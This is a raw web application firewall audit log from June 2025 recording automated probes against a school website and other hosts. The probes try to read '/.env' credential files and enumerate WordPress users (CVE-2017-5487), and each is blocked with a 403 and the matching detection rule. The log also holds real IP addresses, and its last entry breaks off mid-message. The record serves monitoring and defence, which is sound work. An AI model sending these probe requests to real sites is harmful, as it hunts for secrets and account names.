Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f4adc01-Z-- --62172c3a-A-- [02/Jun/2025:13:02:36 +0700] aD0-fH8VMK8tZef_-m_gbQAAAFQ 103.236.140.4 59084 103.236.140.4 8181 --62172c3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.183.203.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.183.203.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --62172c3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62172c3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748844156970172 3610 (- - -) Stopwatch2: 1748844156970172 3610; combined=1463, p1=484, p2=947, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62172c3a-Z-- --b4a4300f-A-- [02/Jun/2025:13:09:42 +0700] aD1AJn8VMK8tZef_-m_gdgAAAEw 103.236.140.4 59168 103.236.140.4 8181 --b4a4300f-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 167.99.210.137 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --b4a4300f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4a4300f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748844582450660 793 (- - -) Stopwatch2: 1748844582450660 793; combined=342, p1=309, p2=0, p3=0, p4=0, p5=33, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4a4300f-Z-- --538ba47e-A-- [02/Jun/2025:13:28:50 +0700] aD1Eou6eDjh4wF4csdt72wAAAJE 103.236.140.4 59470 103.236.140.4 8181 --538ba47e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.155.62.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.155.62.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --538ba47e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --538ba47e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748845730414884 2876 (- - -) Stopwatch2: 1748845730414884 2876; combined=1288, p1=443, p2=817, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --538ba47e-Z-- --e364b26e-A-- [02/Jun/2025:14:03:18 +0700] aD1Mtu6eDjh4wF4csdt8mAAAAIg 103.236.140.4 33480 103.236.140.4 8181 --e364b26e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.199.250.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.199.250.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e364b26e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e364b26e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748847798808270 2682 (- - -) Stopwatch2: 1748847798808270 2682; combined=1432, p1=442, p2=953, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e364b26e-Z-- --f9a55753-A-- [02/Jun/2025:14:27:19 +0700] aD1SV-6eDjh4wF4csduEKAAAAI0 103.236.140.4 47116 103.236.140.4 8181 --f9a55753-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.233.242.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.233.242.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f9a55753-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9a55753-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748849239650760 3075 (- - -) Stopwatch2: 1748849239650760 3075; combined=1307, p1=444, p2=834, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9a55753-Z-- --e1ab8f1a-A-- [02/Jun/2025:14:34:17 +0700] aD1T-X8VMK8tZef_-m_l9wAAAFA 103.236.140.4 47154 103.236.140.4 8181 --e1ab8f1a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.80.184.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.80.184.168 X-Forwarded-Proto: http Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: */* --e1ab8f1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1ab8f1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748849657261002 719 (- - -) Stopwatch2: 1748849657261002 719; combined=281, p1=248, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1ab8f1a-Z-- --c0f86875-A-- [02/Jun/2025:14:45:00 +0700] aD1WfH8VMK8tZef_-m_mAAAAAEk 103.236.140.4 47194 103.236.140.4 8181 --c0f86875-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 8.12; MSIEMobile6.0) Accept-Charset: utf-8 --c0f86875-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0f86875-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748850300981277 808 (- - -) Stopwatch2: 1748850300981277 808; combined=318, p1=278, p2=0, p3=0, p4=0, p5=40, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0f86875-Z-- --301afd43-A-- [02/Jun/2025:15:13:15 +0700] aD1dG9G4Cudp_oIcbnPA2wAAABY 103.236.140.4 48208 103.236.140.4 8181 --301afd43-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.170 Accept-Charset: utf-8 --301afd43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --301afd43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748851995758707 789 (- - -) Stopwatch2: 1748851995758707 789; combined=324, p1=272, p2=0, p3=0, p4=0, p5=52, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --301afd43-Z-- --ff3f5b16-A-- [02/Jun/2025:15:31:48 +0700] aD1hdO6eDjh4wF4csduEeAAAAJI 103.236.140.4 48258 103.236.140.4 8181 --ff3f5b16-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 207.180.223.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 207.180.223.50 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G970U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --ff3f5b16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff3f5b16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748853108892556 926 (- - -) Stopwatch2: 1748853108892556 926; combined=343, p1=300, p2=0, p3=0, p4=0, p5=43, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff3f5b16-Z-- --a3a92e06-A-- [02/Jun/2025:15:32:39 +0700] aD1hp-6eDjh4wF4csduEeQAAAJc 103.236.140.4 48260 103.236.140.4 8181 --a3a92e06-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0) Accept-Charset: utf-8 --a3a92e06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3a92e06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748853159773607 937 (- - -) Stopwatch2: 1748853159773607 937; combined=349, p1=306, p2=0, p3=0, p4=0, p5=43, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3a92e06-Z-- --1c453130-A-- [02/Jun/2025:15:52:00 +0700] aD1mMEA6be0-boUGPH2USgAAANc 103.236.140.4 48482 103.236.140.4 8181 --1c453130-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; CLT-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --1c453130-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c453130-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748854320791279 908 (- - -) Stopwatch2: 1748854320791279 908; combined=358, p1=313, p2=0, p3=0, p4=0, p5=45, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c453130-Z-- --af031d0b-A-- [02/Jun/2025:16:01:59 +0700] aD1oh-6eDjh4wF4csduEjQAAAIw 103.236.140.4 48584 103.236.140.4 8181 --af031d0b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 UBrowser/5.6.13705.206 Safari/537.36 Accept-Charset: utf-8 --af031d0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af031d0b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748854919144801 891 (- - -) Stopwatch2: 1748854919144801 891; combined=354, p1=313, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af031d0b-Z-- --ed37331d-A-- [02/Jun/2025:16:05:03 +0700] aD1pP-6eDjh4wF4csduEkgAAAJU 103.236.140.4 48632 103.236.140.4 8181 --ed37331d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 209.38.28.124 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 209.38.28.124 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ed37331d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed37331d-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748855103351937 796 (- - -) Stopwatch2: 1748855103351937 796; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed37331d-Z-- --51860410-A-- [02/Jun/2025:16:25:48 +0700] aD1uHH8VMK8tZef_-m_mwgAAAEU 103.236.140.4 48758 103.236.140.4 8181 --51860410-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.112.207.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.112.207.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --51860410-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51860410-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748856348992847 3344 (- - -) Stopwatch2: 1748856348992847 3344; combined=1467, p1=516, p2=917, p3=0, p4=0, p5=34, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51860410-Z-- --46c63e64-A-- [02/Jun/2025:17:06:27 +0700] aD13ou6eDjh4wF4csduEsgAAAIE 103.236.140.4 48930 103.236.140.4 8181 --46c63e64-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.14.233.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.14.233.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --46c63e64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46c63e64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748858786998728 2834 (- - -) Stopwatch2: 1748858786998728 2834; combined=1343, p1=445, p2=867, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46c63e64-Z-- --190efe5d-A-- [02/Jun/2025:17:38:35 +0700] aD1_K9G4Cudp_oIcbnPBVQAAAA4 103.236.140.4 49202 103.236.140.4 8181 --190efe5d-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 146.190.242.161 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 146.190.242.161 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --190efe5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --190efe5d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748860715278449 737 (- - -) Stopwatch2: 1748860715278449 737; combined=296, p1=261, p2=0, p3=0, p4=0, p5=34, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --190efe5d-Z-- --f0c52c0c-A-- [02/Jun/2025:17:39:28 +0700] aD1_YEA6be0-boUGPH2UaQAAAMQ 103.236.140.4 49230 103.236.140.4 8181 --f0c52c0c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Baiduspider ( http://www.baidu.com/search/spider.htm) Accept-Charset: utf-8 --f0c52c0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0c52c0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748860768339028 734 (- - -) Stopwatch2: 1748860768339028 734; combined=319, p1=280, p2=0, p3=0, p4=0, p5=38, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0c52c0c-Z-- --a864c90d-A-- [02/Jun/2025:17:51:37 +0700] aD2COdG4Cudp_oIcbnPBaQAAABQ 103.236.140.4 49444 103.236.140.4 8181 --a864c90d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --a864c90d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a864c90d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748861497590350 912 (- - -) Stopwatch2: 1748861497590350 912; combined=403, p1=365, p2=0, p3=0, p4=0, p5=38, sr=164, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a864c90d-Z-- --d33b1c3c-A-- [02/Jun/2025:18:04:33 +0700] aD2FQdG4Cudp_oIcbnPBmAAAAAg 103.236.140.4 49696 103.236.140.4 8181 --d33b1c3c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 4.38.207.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 4.38.207.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d33b1c3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d33b1c3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 